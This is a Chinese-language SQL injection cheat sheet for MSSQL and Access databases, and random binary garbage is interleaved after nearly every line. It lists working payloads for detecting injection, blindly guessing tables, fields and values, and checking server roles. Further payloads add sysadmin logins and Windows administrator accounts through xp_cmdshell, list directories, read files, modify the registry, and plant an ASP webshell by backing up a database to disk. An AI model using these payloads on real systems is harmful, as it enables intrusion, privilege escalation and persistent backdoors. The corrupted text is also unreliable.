1.判断是否有注入;and 1=1 ;and 1=2 ^�3:�y<{J�
2.初步判断是否是mssql ;and user>0 3jG
#<4;J
xU�5�+�"t~
3.注入参数是字符'and [查询条件] and ''=' *[MK���{m
!o k6�*m��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' G��d�08R�W
u|'��}�a3�
5.判断数据库系统 *�w[\(d'T�
��J�|D$��
;and (select count(*) from sysobjects)>0 mssql ^& R�
H]q
"BAH�=ul5E
;and (select count(*) from msysobjects)>0 access y�?1<7>L5~
Q�xj��X:O�
nR��()ei^X
/e0cx:��.w
6.猜数据库 ;and (select Count(*) from [数据库名])>0 qauZ�-Qoc9
:1O1I2�L�0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 /V%�]lmxQ�
�{g7�[3WRy
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 AvNU\$B4aG
|y��*-�)t�
9.(1)猜字段的ascii值(access) ;&� P�K6G
$^1L�|KgXp
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 � KO�Q9K�
0D*uZ,oBEw
(2)猜字段的ascii值(mssql) �e���yLVu.
*x��l930�y
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 3n=`SLj/�a
s?2DLXv}!
10.测试权限结构(mssql) uKB�Sv*A�M
%j=xL���V\
y�dyG�PZ�t
�L`!M�3c@u
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- v-J�9N(y"�
x`���#|8�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 1�`X�-
O>
RXj6L~vs5_
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- z U~�o�"Jv
^S'#)H-8C3
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- C;3>q*Am�4
��W?B(Js�v
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �BIr��24N�
���K[XFJ�9
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- =`l).GnN2`
{�_]'EK/�w
;and 1=(select IS_MEMBER('db_owner'));-- h6V�m;{��~
j��r�9/��
�EpO5�_T_
t#0/��_�tD
11.添加mssql和系统的帐户 !��w[io;��
%!>~2=Q�2*
;exec master.dbo.sp_addlogin username;-- �_�Wjd��`*
;exec master.dbo.sp_password null,username,password;-- aB(6yBBoxj
[A�Z���N a
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- _IK@K��6V1
V�TQxg5P c
;exec master.dbo.xp_cmdshell 'net user username password y@L-�qO+{&
�TyCMZsvM,
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- d/�57;�6I_
c<�8RRY�s�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �N~%F/`Z<+
~alC5|wCUQ
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- g�D\ ��=��
� M�R/�8��
{[&_)AW6m%
-[I}"Glz:�
12.(1)遍历目录 d�UTF0���U
�06��&:X�^
;create table dirs(paths varchar(100), id int) cN{-&\�
6L
1f"L��As`%
;insert dirs exec master.dbo.xp_dirtree 'c:\' Z�X�f^HK�
w;;.bz� m
;and (select top 1 paths from dirs)>0 �-cjwa-9
~
F_Q?0 Do0'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) $��=?��CW(
oM@�X)6�P_
��_l`s}yC
!���*?�Ss�
(2)遍历目录 "�o*zZ;>�^
H@u���C�bT
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- u,�d@�oF(=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 r] +V:l3�
zl�h�}8�Es
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 m,�~��
@1
`z��=I}6){
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ml�|[x�M8
\?b�p^BrI�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �(]Z$mv�!
�"))G|+tz�
0an�g^v�;q
%EZG2J�jO)
13.mssql中的存储过程 @+��v;B�:
���[�>�'�P
xp_regenumvalues 注册表根键, 子键 s��^/<6kwO
�y<G@�7?��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 rsp?N�{e
2EeWcTBU}.
xp_regread 根键,子键,键值名 �QPi]5��z?
+M+h��t��
;exec xp_regread ax�l!z�u*�
��{I��!sXj
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 By
��t�{3$
aqjS�5!�qh
xp_regwrite 根键,子键, 值名, 值类型, 值 �~�$0Qvyb>
ld�J:A*/M6
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 E47U &xL��
Q�1G?�e,�Q
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Q�O�E�Cpk-
3q=A35*LT>
xp_regdeletevalue 根键,子键,值名 `}�;��8���
5�N:THvh6o
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 L`�yyn/2>�
y�7�I')}SC
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 |�]5g+s�d�
V}�#2pP���
��H4H�W�r6
/"t*gN=wrF
14.mssql的backup创建webshell x,\P�V�>��
��^AWM�/aY
use model �GdqT4a\�S
P�NS��Z
j#
create table cmd(str image); �-ISI!EU$�
X*2M�Nx^K~
insert into cmd(str) values (''); s�ilTL��_$
$I��L7c]Gw
backup database model to disk='c:\l.asp'; eCY�gi7?
*�p�M�gj�r
9w
-�t9X>X
`}s$cg�EG�
15.mssql内置函数 �t@Qs&DZ7k
H)$-T1Wx�4
;and (select @@version)>0 获得Windows的版本号 Rx$5�#K!%M
,�zy4�+GW�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa N#�')Qz:�P
Go�}C{�(4T
;and (select user_name())>0 爆当前系统的连接用户 I�$��4GM��
_LV;q! �/j
;and (select db_name())>0 得到当前连接的数据库 C:n55�BE9�
Q(-:)3g[aL
Vwp fk�D`
[@�OXvdT�V
16.简洁的webshell �(hefpq�pi
�%@Nuzd�p
use model So*Q8`�"-.
klG�]PUzd�
create table cmd(str image); A*BI�udli
�I=VP�w5"E
insert into cmd(str) values (''); �J�J3(0�
+
�}L�Np�r��
backup database model to disk='g:\wwwtest\l.asp';
